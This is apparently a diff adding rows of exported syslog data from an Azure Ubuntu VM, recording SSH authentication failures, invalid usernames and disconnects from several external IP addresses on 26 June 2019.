+6979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:53,UbuntuDevEnv,2019-06-26 17:12:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,46393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+6980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:53,UbuntuDevEnv,2019-06-26 17:12:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:55,UbuntuDevEnv,2019-06-26 17:12:54,auth,UbuntuDevEnv,info,Failed password for invalid user public from 111.230.29.17 port 36088 ssh2,46393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,111.230.29.1,36088,,
+6982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:55,UbuntuDevEnv,2019-06-26 17:12:55,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 36088:11: Bye Bye [preauth],46393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,36088,,
+6983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:12:55,UbuntuDevEnv,2019-06-26 17:12:55,auth,UbuntuDevEnv,info,Disconnected from invalid user public 111.230.29.17 port 36088 [preauth],46393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,111.230.29.1,36088,,
+6984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:05,UbuntuDevEnv,2019-06-26 17:13:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=159.65.242.16  user=root,46448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,159.65.242.1,,0,
+6985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:07,UbuntuDevEnv,2019-06-26 17:13:06,auth,UbuntuDevEnv,info,Failed password for root from 159.65.242.16 port 40352 ssh2,46448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.242.1,40352,,
+6986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:07,UbuntuDevEnv,2019-06-26 17:13:07,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 159.65.242.16 port 40352 [preauth],46448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,159.65.242.1,40352,,
+6987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:07,UbuntuDevEnv,2019-06-26 17:13:07,auth,UbuntuDevEnv,info,"Received disconnect from 159.65.242.16 port 40352:11: Normal Shutdown, Thank you for playing [preauth]",46448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.242.1,40352,,
+6988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:13,UbuntuDevEnv,2019-06-26 17:13:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18  user=news,46478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,news,81.0.212.1,,0,
+6989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:16,UbuntuDevEnv,2019-06-26 17:13:15,auth,UbuntuDevEnv,info,Failed password for news from 81.0.212.18 port 57483 ssh2,46478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,57483,,
+6990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:16,UbuntuDevEnv,2019-06-26 17:13:15,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 57483:11: Bye Bye [preauth],46478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,57483,,
+6991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:16,UbuntuDevEnv,2019-06-26 17:13:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user news 81.0.212.18 port 57483 [preauth],46478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,news,81.0.212.1,57483,,
+6992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:22,UbuntuDevEnv,2019-06-26 17:13:21,auth,UbuntuDevEnv,info,Invalid user radio from 35.154.19.93 port 41694,46504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,35.154.19.9,41694,,
+6993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:22,UbuntuDevEnv,2019-06-26 17:13:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:22,UbuntuDevEnv,2019-06-26 17:13:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:23,UbuntuDevEnv,2019-06-26 17:13:23,auth,UbuntuDevEnv,info,Failed password for invalid user radio from 35.154.19.93 port 41694 ssh2,46504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,35.154.19.9,41694,,
+6996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:23,UbuntuDevEnv,2019-06-26 17:13:23,auth,UbuntuDevEnv,info,Disconnected from invalid user radio 35.154.19.93 port 41694 [preauth],46504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,35.154.19.9,41694,,
+6997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:23,UbuntuDevEnv,2019-06-26 17:13:23,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 41694:11: Normal Shutdown, Thank you for playing [preauth]",46504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,41694,,
+6998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:52,UbuntuDevEnv,2019-06-26 17:13:52,auth,UbuntuDevEnv,info,Invalid user postmaster from 35.154.19.93 port 44986,46615,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,35.154.19.9,44986,,
+6999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:52,UbuntuDevEnv,2019-06-26 17:13:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46615,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:52,UbuntuDevEnv,2019-06-26 17:13:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46615,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+7001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:53,UbuntuDevEnv,2019-06-26 17:13:53,auth,UbuntuDevEnv,info,Failed password for invalid user postmaster from 35.154.19.93 port 44986 ssh2,46615,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,35.154.19.9,44986,,
+7002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:53,UbuntuDevEnv,2019-06-26 17:13:53,auth,UbuntuDevEnv,info,Disconnected from invalid user postmaster 35.154.19.93 port 44986 [preauth],46615,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,35.154.19.9,44986,,
+7003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:13:53,UbuntuDevEnv,2019-06-26 17:13:53,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 44986:11: Normal Shutdown, Thank you for playing [preauth]",46615,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,44986,,
+7004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:10,UbuntuDevEnv,2019-06-26 17:14:09,auth,UbuntuDevEnv,info,Invalid user clamav from 77.237.69.165 port 39577,46688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,77.237.69.1,39577,,
+7005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:10,UbuntuDevEnv,2019-06-26 17:14:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,46688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:10,UbuntuDevEnv,2019-06-26 17:14:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:12,UbuntuDevEnv,2019-06-26 17:14:11,auth,UbuntuDevEnv,info,Failed password for invalid user clamav from 77.237.69.165 port 39577 ssh2,46688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,77.237.69.1,39577,,
+7008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:12,UbuntuDevEnv,2019-06-26 17:14:11,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 39577:11: Bye Bye [preauth],46688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,39577,,
+7009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:12,UbuntuDevEnv,2019-06-26 17:14:11,auth,UbuntuDevEnv,info,Disconnected from invalid user clamav 77.237.69.165 port 39577 [preauth],46688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,77.237.69.1,39577,,
+7010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:16,UbuntuDevEnv,2019-06-26 17:14:15,auth,UbuntuDevEnv,info,Invalid user miner from 35.154.19.93 port 48274,46708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,35.154.19.9,48274,,
+7011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:16,UbuntuDevEnv,2019-06-26 17:14:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:16,UbuntuDevEnv,2019-06-26 17:14:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+7013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:17,UbuntuDevEnv,2019-06-26 17:14:16,auth,UbuntuDevEnv,info,Failed password for invalid user miner from 35.154.19.93 port 48274 ssh2,46708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,35.154.19.9,48274,,
+7014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:17,UbuntuDevEnv,2019-06-26 17:14:17,auth,UbuntuDevEnv,info,Connection closed by 171.8.199.77 port 51122 [preauth],46696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,51122,,
+7015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:17,UbuntuDevEnv,2019-06-26 17:14:17,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 48274:11: Normal Shutdown, Thank you for playing [preauth]",46708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,48274,,
+7016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:17,UbuntuDevEnv,2019-06-26 17:14:17,auth,UbuntuDevEnv,info,Disconnected from invalid user miner 35.154.19.93 port 48274 [preauth],46708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,35.154.19.9,48274,,
+7017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:20,UbuntuDevEnv,2019-06-26 17:14:20,auth,UbuntuDevEnv,info,Invalid user kms from 74.94.246.82 port 60082,46725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kms,74.94.246.8,60082,,
+7018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:20,UbuntuDevEnv,2019-06-26 17:14:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:20,UbuntuDevEnv,2019-06-26 17:14:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,46725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:23,UbuntuDevEnv,2019-06-26 17:14:23,auth,UbuntuDevEnv,info,Failed password for invalid user kms from 74.94.246.82 port 60082 ssh2,46725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kms,74.94.246.8,60082,,
+7021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:23,UbuntuDevEnv,2019-06-26 17:14:23,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 60082:11: Bye Bye [preauth],46725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,60082,,
+7022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:23,UbuntuDevEnv,2019-06-26 17:14:23,auth,UbuntuDevEnv,info,Disconnected from invalid user kms 74.94.246.82 port 60082 [preauth],46725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kms,74.94.246.8,60082,,
+7023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:40,UbuntuDevEnv,2019-06-26 17:14:39,auth,UbuntuDevEnv,info,Invalid user ethos from 111.230.29.17 port 49474,46794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,111.230.29.1,49474,,
+7024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:40,UbuntuDevEnv,2019-06-26 17:14:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:40,UbuntuDevEnv,2019-06-26 17:14:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,46794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+7026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:41,UbuntuDevEnv,2019-06-26 17:14:41,auth,UbuntuDevEnv,info,Failed password for invalid user ethos from 111.230.29.17 port 49474 ssh2,46794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,111.230.29.1,49474,,
+7027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:42,UbuntuDevEnv,2019-06-26 17:14:41,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 49474:11: Bye Bye [preauth],46794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,49474,,
+7028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:42,UbuntuDevEnv,2019-06-26 17:14:41,auth,UbuntuDevEnv,info,Disconnected from invalid user ethos 111.230.29.17 port 49474 [preauth],46794,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,111.230.29.1,49474,,
+7029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:43,UbuntuDevEnv,2019-06-26 17:14:42,auth,UbuntuDevEnv,info,Invalid user wayne from 35.154.19.93 port 51594,46802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wayne,35.154.19.9,51594,,
+7030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:43,UbuntuDevEnv,2019-06-26 17:14:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+7031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:43,UbuntuDevEnv,2019-06-26 17:14:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:45,UbuntuDevEnv,2019-06-26 17:14:45,auth,UbuntuDevEnv,info,Failed password for invalid user wayne from 35.154.19.93 port 51594 ssh2,46802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wayne,35.154.19.9,51594,,
+7033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:45,UbuntuDevEnv,2019-06-26 17:14:45,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 51594:11: Normal Shutdown, Thank you for playing [preauth]",46802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,51594,,
+7034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:45,UbuntuDevEnv,2019-06-26 17:14:45,auth,UbuntuDevEnv,info,Disconnected from invalid user wayne 35.154.19.93 port 51594 [preauth],46802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wayne,35.154.19.9,51594,,
+7035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:48,UbuntuDevEnv,2019-06-26 17:14:47,auth,UbuntuDevEnv,info,Invalid user ur from 81.0.212.18 port 38571,46831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ur,81.0.212.1,38571,,
+7036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:48,UbuntuDevEnv,2019-06-26 17:14:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,46831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+7037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:48,UbuntuDevEnv,2019-06-26 17:14:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:49,UbuntuDevEnv,2019-06-26 17:14:49,auth,UbuntuDevEnv,info,Failed password for invalid user ur from 81.0.212.18 port 38571 ssh2,46831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ur,81.0.212.1,38571,,
